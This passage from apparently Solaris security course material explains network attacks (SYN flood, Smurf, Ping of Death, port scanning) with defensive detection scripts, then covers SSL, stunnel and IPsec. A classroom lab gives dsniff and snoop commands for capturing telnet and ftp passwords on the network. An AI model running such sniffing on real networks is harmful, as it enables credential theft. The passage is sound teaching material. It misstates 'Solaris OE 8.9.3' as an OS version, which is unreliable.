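    exact2 = naive_prediction(seen, 250) == isn_rfc1948(t1, *server, "192.168.1.108", 40000)
    return {"mode0_predictable": exact0, "mode2_predictable": exact2}


if __name__ == "__main__":
    print(demo())
    print(parse_tcp_strong_iss("# defaults\nTCP_STRONG_ISS=2\n"))
```

Note that for the same 4-tuple the RFC 1948 value still advances with the clock, which is what keeps old segments from a previous incarnation of that connection from being accepted; only the relationship between different connections is hidden.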


Vulnerabilities of the sendmail Program

Several network attacks target known weaknesses in standard network services. The most notorious network service for being exploited in this way is the sendmail program. The sendmail program listens on port 25 and accepts incoming Simple Mail Transfer Protocol (SMTP) requests.

SMTP, like many Internet protocols, is text-based. You can use the telnet command to connect to an SMTP server and initiate an SMTP dialog, as shown in Code 10-3.

Code 10-3 SMTP Dialog

# telnet localhost 25
220 wallace ESMTP Sendmail 8.9.3+Sun/8.9.3; Fri, 27 Apr 2001 14:32:39 +0100 (BST)
HELO wallace
250 wallace Hello [192.168.1.1], pleased to meet you


In Code 10-3 on page 10-28, you connected to the sendmail program and can now enter commands to send email. The original version of the sendmail program also allowed you to enter a command to debug the sendmail server, which was a very useful feature during development. The debug command allowed you to run a shell (for debugging) with root user privileges.

This debug feature was removed from sendmail years ago, but sendmail has other features which could let an intruder break in to systems. These have slowly been closed down, but even now there are regular security alerts about new sendmail vulnerabilities.

Several other SMTP servers, such as iPlanet Messaging Server and DMail, can be used as more secure alternatives to sendmail.


Buffer Overflow Attacks

The sendmail program, and many other network servers such as the fingerd daemon, have suffered from a common problem known as buffer overflow.

In basic terms, a buffer overflow occurs when the programmer writing the network server fails to limit the amount of data that the client can enter into the program. When the client program (or an intruder typing in from the keyboard) enters too much data for the buffer, the data overwrites other data or the server program itself.

In paper-based terms, a buffer overflow is like filling in a form where the box you need to complete is too small to contain the information. You continue writing outside the box and hope that is acceptable to the person reading the form. You have just caused the paper equivalent of a buffer overflow.


If the form were printed with a black background and the only white area were inside the box, then you could not cause the buffer overflow (you would just have to write smaller letters). Many programmers take the same precautions when writing code, but not all programmers are aware of the problems of buffer overflow, and security weaknesses keep cropping up in software systems.

When a server buffer overflow occurs, several problems can happen:

● The excess data corrupts part of the program and the server crashes. The service is now unavailable. While some systems might automatically restart crashed services, many do not. This is an example of a DoS attack.

● The excess data overwrites valid data in the program, which can corrupt the data. This corruption might not be noticed for some time (if ever).

● The excess data overwrites part of the server program with a program of its own which, when executed, can enable an intruder to break into the system. The infamous Internet Worm released in 1988 used this technique to infiltrate copies of itself into a significant portion of the Internet.

Most buffer overflow problems have been found and fixed in common network servers. However, new servers and enhancements to existing code often show buffer overflow weaknesses.

If a new buffer overflow weakness is discovered, check to see if a temporary wrapper is available from http://www.auscer.org.au/, which you can use until a patch is released from the vendor.


Web (HTTP) Servers

Web servers are also vulnerable to attack. Web servers are becoming more vulnerable because of the demands on organizations to provide Web-based services with sophisticated features.

Many Web servers use Common Gateway Interface (CGI) scripts to provide dynamic content. Most CGI scripts are written using languages like Perl or Personal Home Page (PHP), which were written for speed and ease of program development and not for security. A knowledgeable intruder can exploit the security holes in these languages.

The trend towards using Java™ technology servlets and JavaServer Pages™ (JSP™) as a more secure alternative is helping improve Hypertext Transfer Protocol (HTTP) server security.


Network Denial of Service Attacks

A general discussion of DoS attacks was given in Module 4. DoS attacks are quite common. While they might appear to be just a nuisance, they are often serious:

● Losing a server for a few minutes costs most organizations money and can adversely affect future business. Losing a server for longer than a few minutes can have dire consequences for your business.

● If your service is unresponsive (especially if it is a Web service), you might lose business to a competitor who has not been attacked.

● If the press is told about your “poor” service, you might get bad publicity, which can cause your customers to worry and potentially take their business elsewhere.


● If your service becomes unavailable, an intruder might spoof (impersonate) your system (borrow your IP address) to collect information about your customers.

● After a successful attack, you can clean your system and reboot. Rebooting is sometimes what an intruder wants you to do. Perhaps the intruder has successfully broken into your system and needs you to reboot to activate a back door or complete a rootkit installation. A DoS attack is a good way to force a reboot.


Types of Network Denial of Service Attacks

There are many types of DoS attack, ranging from the brute-force approach of sending large numbers of requests to a server to more subtle attacks using network protocol features.

Three of the network protocol attacks are:

● TCP SYN flooding

● Ping of death

● Smurf

TCP SYN Flood Attack

As part of the initiation of a TCP service connection (such as ftp, telnet, HTTP, or SMTP), a three-way handshake must take place, as shown in Figure 10-1 on page 10-36.


Figure 10-1 TCP Three-Way Handshake

The steps in a three-way handshake are:

1. The client sends a synchronize (SYN) message to the server.

2. The server responds with a synchronize acknowledgment (SYN/ACK) message to the client.

3. The client completes the initialization of the TCP session by sending an ACK back to the server.

In a TCP SYN flood attack, the client sets a non-existent system as the reply address of the initial SYN message. The server sends the SYN/ACK response to the non-existent system and never gets the final ACK response.

Eventually the server times out the connection (the time-out can range from 75 seconds to 23 minutes depending upon network configuration parameters). During the time-out period the server is holding onto kernel resources required during the TCP session initialization.

TCP initialization generally requires more kernel resources than when the session is established. While a server might support hundreds or thousands of concurrent TCP sessions, it might only be able to support a few tens of connections in the initialization phase. If the client sends a falsified SYN packet every 10 seconds, it could completely disable TCP services on a server by causing the kernel to run out of resources.


TCP SYN flood attacks are popular because the client has little work to do to disable a server.

If the client’s SYN packet mistakenly specifies a reply address of a valid system, then that system sends a reset (RST) message to the server for the unexpected SYN/ACK message. The server resets the TCP session, releasing all the kernel resources tied up for the initialization, which effectively nullifies the TCP SYN flood.

Note – See the Sun Microsystems Security Bulletin #00136, 9 Oct. 1996 for more information (available in the Security Bulletin Archive at http://sunsolve.sun.com/pub-cgi/secBulletin.pl). A general, cross-environment discussion of this issue is available from CERT at http://www.cert.org/advisories/CA-1996-21.html.


Ping of Death Attack

The Ping of Death attack is another DoS attack. The attack involves sending an IP packet that is too large to be a legal packet (more than 65535 bytes in size). The attack usually uses the low-level Internet Control Message Protocol (ICMP) packets that the ping command uses.

The packet is fragmented into packets at the Maximum Transfer Unit (MTU) size for transmission over the network. The reassembly stage on the remote machine overflows memory because so many larger-than-expected packets are received in a short period of time.

Note – The default MTU on a Solaris OE platform using Ethernet is 1500 bytes. The Solaris OE on the SPARC™ system is immune to this attack. Unpatched Solaris OE x86 systems (2.5.1 and lower) are vulnerable.


Smurf Attack

A Smurf attack is simple and effective. It uses the same low-level ICMP protocol that the ping utility uses.

Usually, the ping utility tests to see if a particular server is online. A client sends a ping message to the server and the server automatically sends the message back to the client (the name ping derives from the sound made by sonar echo detection devices used during World War II).

A Smurf attack falsifies the reply address in the ping ICMP packet by setting it to the address of the system under attack. The client then sends the ping message to the broadcast address for the network containing the system under attack.

The result is immediate and dramatic. Every host on the network receives the ping message and echoes it back, not to the intruder, but to the system whose address was in the ICMP reply field. The system under attack receives up to 254 ping responses in a very short period of time.


If the system were attacked only once, the system might survive and process the ping replies, but the target’s network is temporarily overloaded. However, if the intruder broadcasts a ping packet every second to the network, all available network bandwidth is tied up and the target system is swamped with network packets. As network and CPU resources are exhausted, the system slows to a crawl.

A user with a 28.8-kilobit-per-second modem can put out enough bandwidth to fill one-third of the capacity of a T1 (1.54 megabits/sec.) line. Yale University removed its Internet Relay Chat (IRC) server because of these attacks, and New York University was once flooded so badly it was off the network for two weeks.


Smurf Countermeasures

Smurf is so nasty that you should always implement the Solaris OE countermeasure. The solution is to disable ping replies to broadcast addresses. Do this by adding the following line to the /etc/init.d/inet file as part of the network startup:

ndd -set /dev/ip ip_respond_to_echo_broadcast 0


Recognizing Network Attacks

It is difficult from a Solaris OE server to recognize network attacks. Specialized network monitoring is often required to detect attacks like TCP SYN flooding, Ping of Death, and Smurf.

On a server, network attacks are usually seen after the event; they are not detected until they have been successful. In fact, many network attacks go entirely unnoticed unless they are DoS attacks.
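Part of the monitoring this section says a server alone cannot do can be illustrated by analyzing capture output. The following Python is an added example, not part of the course material: it parses constructed lines written in the style of snoop summary output with relative timestamps (time, src -> dst, protocol summary; the hosts, addresses and traffic are all made up for the example) and applies two checks, one for the half-open connections a SYN flood leaves behind (a RST from a real host clears its entry, as the SYN flood section describes) and one for the burst of echo replies from many different hosts that marks a Smurf.

```python
import re
from collections import defaultdict

# Constructed sample in the style of snoop summary lines with relative timestamps.
# Not real captured traffic; every host, address and port below is invented.
SAMPLE_CAPTURE = """\
0.00000 192.168.1.107 -> wallace TCP D=23 S=40000 Syn Seq=100 Len=0 Win=8760
0.00050 wallace -> 192.168.1.107 TCP D=40000 S=23 Syn Ack=101 Seq=500 Len=0 Win=8760
0.00100 192.168.1.107 -> wallace TCP D=23 S=40000 Ack=501 Seq=101 Len=0 Win=8760
0.10000 10.9.9.1 -> wallace TCP D=25 S=1025 Syn Seq=1 Len=0 Win=512
0.10010 10.9.9.2 -> wallace TCP D=25 S=1026 Syn Seq=1 Len=0 Win=512
0.10020 10.9.9.3 -> wallace TCP D=25 S=1027 Syn Seq=1 Len=0 Win=512
0.10030 10.9.9.4 -> wallace TCP D=25 S=1028 Syn Seq=1 Len=0 Win=512
0.10040 10.9.9.5 -> wallace TCP D=25 S=1029 Syn Seq=1 Len=0 Win=512
0.10050 10.9.9.6 -> wallace TCP D=25 S=1030 Syn Seq=1 Len=0 Win=512
0.10060 192.168.1.50 -> wallace TCP D=25 S=1031 Syn Seq=1 Len=0 Win=512
0.10065 wallace -> 192.168.1.50 TCP D=1031 S=25 Syn Ack=2 Seq=900 Len=0 Win=8760
0.10070 192.168.1.50 -> wallace TCP D=25 S=1031 Rst Ack=2 Seq=2 Len=0 Win=0
0.20000 192.168.1.3 -> victim ICMP Echo reply
0.20010 192.168.1.4 -> victim ICMP Echo reply
0.20020 192.168.1.5 -> victim ICMP Echo reply
0.20030 192.168.1.6 -> victim ICMP Echo reply
0.20040 192.168.1.7 -> victim ICMP Echo reply
5.00000 wallace -> 192.168.1.107 ICMP Echo reply
"""

LINE_RE = re.compile(r"^\s*([\d.]+)\s+(\S+) -> (\S+)\s+(TCP|ICMP)\s+(.*)$")
TCP_FLAGS = {"Syn", "Ack", "Rst", "Fin", "Push", "Urg"}


def parse_capture(text):
    """Turn summary lines into records: time, src, dst, proto, TCP ports and flags."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        time, src, dst, proto, rest = m.groups()
        rec = {"time": float(time), "src": src, "dst": dst, "proto": proto, "flags": set()}
        if proto == "TCP":
            for field in rest.split():
                if field.startswith("D="):
                    rec["dport"] = int(field[2:])
                elif field.startswith("S="):
                    rec["sport"] = int(field[2:])
                elif field in TCP_FLAGS:
                    rec["flags"].add(field)
                elif field.startswith("Ack="):   # the ACK flag is shown with its number
                    rec["flags"].add("Ack")
        else:
            rec["info"] = rest
        records.append(rec)
    return records


def half_open_connections(records, threshold=5):
    """Return {server: count} for servers left holding at least `threshold` embryonic connections:
    a SYN was seen but neither the client's final ACK nor a RST for that 4-tuple followed."""
    pending = {}
    for r in records:
        if r["proto"] != "TCP":
            continue
        key = (r["src"], r.get("sport"), r["dst"], r.get("dport"))
        flags = r["flags"]
        if "Syn" in flags and "Ack" not in flags:
            pending[key] = r["time"]       # handshake step 1
        elif "Rst" in flags or ("Ack" in flags and "Syn" not in flags):
            pending.pop(key, None)         # step 3 completed, or a real host reset the stray SYN/ACK
    counts = defaultdict(int)
    for (_, _, dst, _) in pending:
        counts[dst] += 1
    return {dst: n for dst, n in counts.items() if n >= threshold}


def echo_reply_storms(records, window=1.0, min_sources=4):
    """Return {target: distinct_sources} where at least `min_sources` different hosts sent ICMP
    echo replies to one target within `window` seconds, the signature of Smurf amplification."""
    by_target = defaultdict(list)
    for r in records:
        if r["proto"] == "ICMP" and "Echo reply" in r["info"]:
            by_target[r["dst"]].append((r["time"], r["src"]))
    storms = {}
    for target, replies in by_target.items():
        replies.sort()
        best = start = 0
        for end in range(len(replies)):
            while replies[end][0] - replies[start][0] > window:
                start += 1
            best = max(best, len({src for _, src in replies[start:end + 1]}))
        if best >= min_sources:
            storms[target] = best
    return storms


if __name__ == "__main__":
    recs = parse_capture(SAMPLE_CAPTURE)
    print("half-open:", half_open_connections(recs))
    print("echo reply storms:", echo_reply_storms(recs))
```

The thresholds are deliberately low so the constructed sample trips them; on a real network they would be tuned to the server's normal connection rate, and the half-open check would be run against the same time-out the kernel applies.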


Port Scanning Using the nmap Utility

One technique intruders use while setting up a network attack is to scan a server for all the services running. This process is known as a port scan, and the best known utility for this is nmap (nmap can be obtained from http://www.insecure.org/nmap).

The nmap utility attempts to connect to every port on your server. If the nmap utility makes a successful connection, it attempts to identify the service on that port by analyzing any data sent out by the server, as shown in Code 10-4.

Code 10-4 Sample nmap Output

# nmap -P0 192.168.0.250

Starting nmap V. 2.54BETA7 ( www.insecure.org/nmap/ )
Interesting ports on sunfrog (192.168.0.250):
(The 1505 ports scanned but not shown below are in state: closed)
Port State Service
7/tcp open echo
9/tcp open discard
13/tcp open daytime
19/tcp open chargen
21/tcp open ftp
23/tcp open telnet
37/tcp open time
111/tcp open sunrpc
139/tcp open netbios-ssn
512/tcp open exec
513/tcp open login
514/tcp open shell
515/tcp open printer
540/tcp open uucp
2049/tcp open nfs
4045/tcp open lockd
6000/tcp open X11
6112/tcp open dtspc
7100/tcp open font-service
8888/tcp open sun-answerbook
32774/tcp open sometimes-rpc11
32775/tcp open sometimes-rpc13
32776/tcp open sometimes-rpc15
32777/tcp open sometimes-rpc17
32778/tcp open sometimes-rpc19
32779/tcp open sometimes-rpc21
32780/tcp open sometimes-rpc23
32786/tcp open sometimes-rpc25
32787/tcp open sometimes-rpc27

Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds


Host Information From the nmap Utility

If the nmap utility is connected to the sendmail port shown in Code 10-3 on page 10-28, it could detect from the prompt string that this is an Extended Simple Mail Transfer Protocol (ESMTP) server (it supports a newer version of SMTP which is a superset of the SMTP service).

Using the information it obtains from a service’s data output, the nmap utility can determine a lot about your server. For example, the nmap utility can look at Code 10-3 on page 10-28 and determine the following:

● Server name – wallace

● Operating system and version – Solaris OE 8.9.3

● Server version – sendmail 8.9.3

● Date – The date and time on the server


With this information, the intruder can look up known weaknesses in the operating system and in the program versions and then attempt to break in to the system. Even knowing which ports are open and which are closed can enable the nmap utility to determine the system type (firewall, router, UNIX, Solaris OE, and so on).

Detecting Port Scanning

Port scanning usually involves a large number of connections arriving at your server over a short period of time. Often, the connections step through the port numbers in numeric order.

Scanning defense products, such as PortSentry (obtainable from http://www.psionic.com/abacus), can recognize this activity. The usual defense is to reconfigure the kernel (or network interface) to refuse to accept connections from the system attempting the port scan. The kernel configuration can be automated in some of the scanning defense tools.

Note – Some legitimate tools, such as SAINT, can be detected by port scanning defenses.
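The pattern this section describes (many distinct ports from one source in a short time, often in numeric order) can be checked against a connection log. The following Python is an added example, not part of the course and not PortSentry's code; the log entries are constructed, the port list for one scanner is borrowed from the open ports in Code 10-4, and the allowlist parameter exists so that a known assessment tool, such as the SAINT run the note mentions, is reported but not blocked.

```python
from collections import defaultdict

# Constructed connection log: (seconds since start, source address, destination port),
# modelled on what a wrapper or scan-detection listener would record. Not real data.
CONNECTION_LOG = [
    (0.0, "192.168.1.107", 23),
    (12.0, "192.168.1.107", 21),
    (40.0, "192.168.1.108", 25),
    # sequential sweep: ten consecutive ports in two seconds
    *[(60.0 + i * 0.2, "10.9.9.5", 20 + i) for i in range(10)],
    # unordered sweep of the open Solaris ports listed in Code 10-4
    *[(90.0 + i * 0.1, "10.9.9.6", p)
      for i, p in enumerate([8888, 111, 6000, 2049, 514, 515, 512, 6112])],
    # an authorised assessment scanner (the SAINT case from the note)
    *[(120.0 + i * 0.1, "192.168.1.200", p) for i, p in enumerate([7, 9, 13, 19, 21, 23])],
]


def longest_consecutive_run(ports):
    """Length of the longest run of numerically adjacent ports (20, 21, 22, ...)."""
    s = sorted(set(ports))
    best = run = 1 if s else 0
    for a, b in zip(s, s[1:]):
        run = run + 1 if b == a + 1 else 1
        best = max(best, run)
    return best


def detect_port_scans(log, window=10.0, min_ports=6, allowlist=frozenset()):
    """Flag sources that touched at least `min_ports` distinct ports within `window` seconds.
    Returns {source: {"ports": n, "sequential": bool}}. Allowlisted sources are skipped so a
    known assessment host is not cut off by the automated reaction."""
    by_src = defaultdict(list)
    for t, src, port in log:
        if src not in allowlist:
            by_src[src].append((t, port))
    findings = {}
    for src, events in by_src.items():
        events.sort()
        start = 0
        best_ports = set()
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            ports = {p for _, p in events[start:end + 1]}
            if len(ports) > len(best_ports):
                best_ports = ports
        if len(best_ports) >= min_ports:
            findings[src] = {
                "ports": len(best_ports),
                "sequential": longest_consecutive_run(best_ports) >= 5,
            }
    return findings


def sources_to_block(log, **kwargs):
    """The reaction PortSentry automates: the sources whose further connections should be refused."""
    return sorted(detect_port_scans(log, **kwargs))


if __name__ == "__main__":
    print(detect_port_scans(CONNECTION_LOG))
    print(sources_to_block(CONNECTION_LOG, allowlist=frozenset({"192.168.1.200"})))
```

Without the allowlist the authorised scanner is flagged exactly like the others, which is the false positive the note warns about; the sequential flag separates a naive sweep from a tool that randomizes port order, but both still exceed the distinct-port threshold.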


Exercise: Using Network Sniffing

In this exercise, you will complete the following tasks:

● Use the snoop utility to sniff network traffic

● Install the dsniff utility

● Use the dsniff utility to harvest user names and passwords from the network

Preparation

There is no special preparation required for these tasks.

Tasks

Working in pairs, use the snoop and dsniff utilities to sniff the network traffic that the telnet command creates between two different workstations. Due to the implementation of the Solaris TCP/IP stack, you cannot correctly sniff network traffic if the source and destination workstations are the same machine.

Task – Using the snoop Utility to Sniff Network Traffic

Follow these steps:

1. Obtain the IP addresses of your system and the workstation of the person next to you. Run the snoop utility to collect data between the two workstations.

2. With your colleague’s approval, log in to the other workstation using the telnet command.

3. Log out and connect again using the ftp command.

4. Stop the snoop command and examine the data you have collected. Identify the login name and password you used for both the telnet and ftp commands.


5. Run the snoop utility again. Watch for ftp connections into your host. Use the ftp command to connect to your host to make sure that you see your connection.

6. Examine the data you collected and identify the login name and password you used. It should be easier this time, because you have only ftp data to examine.

Task – Installing the dsniff Utility

You can download the dsniff utility from the Sun Freeware Web site. A copy has already been downloaded and saved in the /usr/local/pkg directory. Install this SVR4 package using the pkgadd command. You also need to install the OpenSSL and libpcap libraries, which are available from the same Web site and the /usr/local/pkg directory.

Task – Using the dsniff Utility

Follow these steps:

1. Obtain the IP address of your system and run the dsniff utility to collect telnet data for your workstation and place the data into a data file.

2. In a separate window, use the telnet command to log in to your workstation and then use the su command to log in as root user.

3. Log out, stop the dsniff utility, and examine the passwords that you captured.

4. Run the dsniff utility for the whole network and collect passwords from your colleagues. Because they are doing the same to you, give them some data to work with by using the telnet command to log in to your own machine (or a colleague’s with their approval). Do not forget to log out again so that the session data can be captured.

Note – If you have used one of your favorite passwords for an account on your system, do not log in to this account. You do not want your colleagues to be aware of passwords that you use back in the office. Use the sample accounts for alice, bob, and eve for the passwords, because these accounts are known to all users on the course.


Exercise Summary

Discussion – Take a few minutes to discuss what experiences, issues, or discoveries you had during the lab exercise.

● Experiences

● Interpretations

● Conclusions

● Applications


Exercise Solutions

The following are solutions to the exercises. If you have any questions about either the exercises or the given solutions, please ask your instructor.

Using the snoop Utility to Sniff Network Traffic

1. Assuming your workstation IP address is 192.168.1.107 and your colleague’s is 192.168.1.108, use the following command to monitor traffic between the two systems:

# snoop 192.168.1.107 and 192.168.1.108

5. To monitor incoming ftp traffic on your host use:

# snoop 192.168.1.107 and port ftp

or

# snoop host localhost and port ftp

Installing the dsniff Utility

Install the dsniff utility using:

# cd /usr/local/pkg
# pkgadd -d libpcap-0_6_1-sol8-sparc-local
# pkgadd -d openssl-0_9_6-sol8-sparc-local
# pkgadd -d dsniff-2.3-sol8-sparc-local

Using the dsniff Utility

1. Save telnet data to a file called data1 for your system only with:

# dsniff -w data1 host localhost and port telnet

2. In a separate window, use the telnet command to log in to your workstation and then use the su command to log in as root user.


3. Type Control-C to stop this command after running your telnet session from another window. View the collected data using:

# dsniff -r data1

4. Collect all telnet data on the network with:

# dsniff port telnet

This displays the captured data as it is collected, but only when the captured telnet session terminates.


Module 11

Securing Network Data

Objectives

Upon completion of this module, you should be able to:

● Describe the basic aspects of the Secure Sockets Layer (SSL)

● Explain why SSL is required, and what it does

● Configure secure communications between hosts using IPsec


Relevance

Discussion – The following questions are relevant to understanding the purpose of securing the low-level data transferred across your networks:

● How do you secure low-level communications between hosts?

● Is there a mechanism that allows you to use the telnet program securely to log in to your hosts?


Additional Resources

Additional resources – The following references provide additional information on the topics described in this module:

The following additional resources may be found useful when attempting to understand SSL.

● For information on SSL: http://www.openssl.org

● General cryptography: http://www.ssh.com/tech/crypto

● System administration: http://darkwing.uoregon.edu/~hak/unix.html

● Menezes, Alfred J., Paul C. van Oorschot, and Scott A. Vanstone. Handbook of Applied Cryptography. CRC Press, 1996.

● Veeraraghavan, Sriranga and Paul Watters. Solaris 8: The Complete Reference. Osborne McGraw Hill, 1999.

● Winsor, Janice. Solaris 8 System Administrator's Reference Guide. Prentice-Hall PTR, 2000.

● Sun Security Enhancements Online: http://www.sun.com

● Online manual pages for ipsecconf(1M), ipseckey(1M), and ipsec(7P)


Implementing Secure Communication Using SSL

While security measures that protect physical devices attached to, or forming part of, host machines are essential, it is also important for communications between machines to be secure. SSL provides secure communications between machines. SSL is a non-proprietary protocol and is widely used.

The most common implementation of SSL (but not the only one) is supported and maintained by the OpenSSL group, online at http://www.openssl.org.


The Open SSL Project

The OpenSSL Project is an open development project designed to produce a commercial-grade open-source toolkit implementation of the SSL and Transport Layer Security (TLS) protocols. The toolkit incorporates a general purpose cryptography library (for the full-strength version you must use one of the non-U.S. Web sites for the source code download). OpenSSL is based on the SSLeay library developed by Eric A. Young and Tim J. Hudson.

Caution – Some countries still prohibit the use of strong encryption. Before implementing the full-strength versions of SSL, ensure that the use of this type of encryption does not break the national law of the country in which the machine resides.


Defining the SSL

The SSL protocol’s goal is to provide privacy and reliability between two communicating applications. The applications can be operating system components, such as a client “talking” to a server, or two (or more) peer machines swapping data. A specific advantage of SSL is that it is application protocol independent. In other words, SSL works with both high level and low level protocols.

SSL is always composed of two layers. The lower layer, the SSL Record Protocol, sits on top of a reliable transport protocol, most commonly TCP/IP and its wrappers. The SSL Record Protocol encapsulates the various higher level protocols. A typical example is the SSL Handshake Protocol, which allows a server and client to mutually authenticate and negotiate an encryption algorithm and associated cryptographic keys. A second, higher-level protocol is used transparently on top of the SSL Record Protocol.

Often, a specific daemon encapsulates the SSL layers. Applications can continue to use open and non-secure ports, but those ports are actually fully encrypted by the SSL daemon. This is sometimes known as transparent encryption because the encryption is hidden from the application, but is still there.


Properties of SSL

The SSL protocol provides connection security with three basic properties:

● The connection is private between the two machines.

● The peer's identity can be authenticated using asymmetric (public key) cryptography. Each authenticated peer presents a certificate issued by a certificate authority (CA), sometimes known as a trusted third party, and proves possession of the corresponding private key; the CA's digital signature on the certificate is what the other side verifies. Typically only the server is authenticated; client certificates are optional.

● The connection is reliable.

SSL uses an asymmetric (public key) cipher to agree on a secret session key. Symmetric cryptography (for example, Data Encryption Standard (DES) or RC4) is used for the actual data encryption, because symmetric encryption is much faster than asymmetric encryption.

The message transport includes a message integrity check: each record carries a keyed message authentication code (MAC) computed with a secure hash function, for example Secure Hash Algorithm (SHA-1) or Message Digest 5 (MD5). Because the MAC key is known only to the two peers and the MAC covers a sequence number, there is a built-in defense against anyone tampering with or replaying the packets.


Simplifying SSL Using the stunnel Program

A convenient method of providing SSL between clients is to use the open source program stunnel. The stunnel program is an SSL wrapper daemon which, when running on both machines, provides an encrypted portal between them.

For example, host A has a client application that does not use SSL but uses plain sockets instead, and host B runs the matching server on port 1235. Configure the stunnel program on both machines: on host A, stunnel listens on port 1234 and the client application connects to that local port instead of to host B directly; stunnel encrypts the connection and forwards it to the stunnel daemon on host B, which decrypts it and connects to the server on port 1235. Neither application is modified and neither sees SSL, yet all traffic between hosts A and B is encrypted.

The stunnel daemon is widely used in configuring Virtual Private Networks (VPNs) and for communications between clients and remote Lightweight Directory Access Protocol (LDAP) servers.


The stunnel program is not a complete SSL product. You still need an SSL library, such as OpenSSL, to provide the handshaking and encryption, and a server certificate and key for the listening side. Two limitations are worth remembering: stunnel only wraps TCP connections (UDP traffic is not protected), and unless the client side is configured to verify the server's certificate against a trusted CA, it accepts any certificate and the tunnel can be intercepted. Information on the stunnel program can be obtained from: http://www.stunnel.org/ .
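The redirection described above, as a worked configuration. The following shell script is an added example, not part of the Sun course or of the stunnel distribution: it writes the two stunnel configuration files for the host A / host B scenario in the stunnel 4 configuration-file format. Ports 1234 and 1235 are those in the text; the SSL listener port 1236, the host name hostB and the PEM file names are assumptions made for this illustration.

```shell
#!/bin/sh
# Added example, not part of the Sun course or of stunnel itself: write the
# two stunnel configuration files for the host A / host B scenario above,
# in the stunnel 4 configuration-file format. Ports 1234 and 1235 are from
# the text; the SSL listener port 1236, the host name hostB and the PEM
# file names are assumptions made for this illustration.

# Server side (host B): accept SSL on 1236, hand clear text to the local
# application on 1235. The certificate and private key are in one PEM
# file that must be readable by root only.
write_stunnel_server_conf() {
    cat > "$1/server.conf" <<'EOF'
; stunnel on host B
cert   = /etc/stunnel/hostB.pem
key    = /etc/stunnel/hostB.pem
setuid = nobody
setgid = nobody
pid    = /var/run/stunnel-server.pid

[app]
accept  = 1236
connect = 127.0.0.1:1235
EOF
}

# Client side (host A): the application connects to 127.0.0.1:1234 exactly
# as before; stunnel forwards it over SSL to hostB:1236. verify = 2 plus a
# CAfile makes stunnel require a server certificate that chains to our CA;
# without these two lines it accepts any certificate, and a host that can
# intercept the path to hostB can sit in the middle unnoticed.
write_stunnel_client_conf() {
    cat > "$1/client.conf" <<'EOF'
; stunnel on host A
client = yes
verify = 2
CAfile = /etc/stunnel/ca.pem
setuid = nobody
setgid = nobody
pid    = /var/run/stunnel-client.pid

[app]
accept  = 127.0.0.1:1234
connect = hostB:1236
EOF
}

# Review check: does a client configuration actually verify the peer?
# Returns 0 when "verify = 2" is present, 1 otherwise.
client_verifies_peer() {
    grep -q '^verify[[:space:]]*=[[:space:]]*2[[:space:]]*$' "$1"
}

STUNNEL_DIR=${STUNNEL_DIR:-$(mktemp -d)}
write_stunnel_server_conf "$STUNNEL_DIR"
write_stunnel_client_conf "$STUNNEL_DIR"
if client_verifies_peer "$STUNNEL_DIR/client.conf"; then
    echo "client.conf verifies the server certificate"
fi
# On the real hosts: copy the files to /etc/stunnel and run
#   stunnel /etc/stunnel/server.conf    (host B)
#   stunnel /etc/stunnel/client.conf    (host A)
# A self-signed server certificate for testing can be made with
#   openssl req -new -x509 -days 365 -nodes -keyout hostB.pem -out hostB.pem
```

Start stunnel with the server file on host B and the client file on host A; the client application then connects to 127.0.0.1:1234 unchanged. The two settings to look for in any such configuration are verify = 2 with a CAfile on the client side (without them the client accepts any certificate) and a loopback-only accept address, so that the clear-text leg never leaves the host.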


How Secure Is the SSL?

SSL is probably sufficiently secure for most practical purposes. However, even in its most secure form, SSL is not totally secure.

SSL works by encrypting information transmitted between machines. It uses public-private key encryption to authenticate hosts and to exchange session keys. The session key then encrypts the data between the hosts. There are problems with this encryption method.

The first problem is the session key length. Many governments are uncomfortable with the thought of private citizens sending information which cannot be decrypted, even by governmental organizations. The key lengths of encryption ciphers are therefore restricted in many countries, and a cipher is easier to break with a shorter key.


The second problem is deliberate attack. A group of hackers known as the Key Cracking Ring has given notice that it plans to publish methods for compromising the security of SSL on all systems. The low-security (40-bit, export-grade) cipher suites have already been compromised by brute-force searches of the key space. Cipher suites using strong (128-bit) symmetric encryption remain unbroken: a 128-bit key is far beyond brute force, so the realistic threats are weaknesses in the public-key exchange (too-short RSA keys, which factoring attacks target), in random number generation, or in the implementation, rather than in the session key itself.


Understanding the IP Security Architecture (IPsec)

For the Solaris OE, and most other operating systems, network-layer encryption is provided by the IP Security Architecture (IPsec). IPsec provides both encryption and authentication (validation) of data. IPsec is a set of standards developed by the Internet Engineering Task Force (IETF); implementations are available for most major versions of UNIX (including Linux) and for Microsoft Windows, and the Solaris 8 OE implementation is part of the operating system.

Like the stunnel program, IPsec is transparent to the application, but it operates at a lower level: processing is done in the kernel, within the IP layer, rather than by a user-level daemon wrapping individual TCP connections. When in place and configured, IPsec encrypts all IP traffic selected by the policy, irrespective of the application and without the application's knowledge; it protects UDP and other non-TCP protocols as well as TCP. IPsec also provides host-to-host authentication. Because IPsec works at the IP level, it can be applied both at the system level and at the level of an individual socket. You configure system-level IPsec with a suite of command line utilities. The per-socket implementation requires programming expertise and is not covered here.

Note – Use authentication together with encryption. ESP with encryption alone hides the data but does not detect datagrams that have been modified or forged in transit; add an ESP authentication algorithm (encr_auth_algs) or an AH policy so that integrity and origin are checked as well.


Configuring IPsec Security Associations

IPsec's secure communication is governed by security associations (SAs). An SA holds the keys, algorithms, and security parameters index (SPI) for one direction of traffic between two hosts, so two machines require at least two SAs to communicate, one for the inbound and one for the outbound traffic. Creating and maintaining SAs is called key management. The Solaris 8 OE implementation of IPsec does not support automatic SA management; SAs are created manually with the ipseckey utility.

IPsec provides two types of IP packet protection: an authentication header (AH), which provides the authentication component, and the encapsulating security payload (ESP), which provides encryption and, optionally, its own authentication of the encrypted payload. You can use both ESP and AH in the same datagram.

Datagrams originating from within the system, or that have the system as their target, are affected by the IPsec settings. Datagrams that are merely forwarded are not affected by the IPsec settings, because they do not belong to the system.


Adding IPsec Keys

Use the ipseckey utility to configure the authentication and encryption keys. The ipseckey utility accepts single-line commands from the command line or, if no command line parameters are specified, enters an interactive session. Useful ipseckey commands are:

add – Adds a new key definition

flush – Removes all existing definitions

dump – Outputs stored key definitions

The ipseckey command allows commands to be stored in files using the following command line options:

-f filename – Reads commands from the file

-s filename – Saves the currently loaded key definitions to the file in a form that -f can read back (use - as the file name to list the key commands on standard output). The output contains the keys themselves, so protect or delete the saved file.


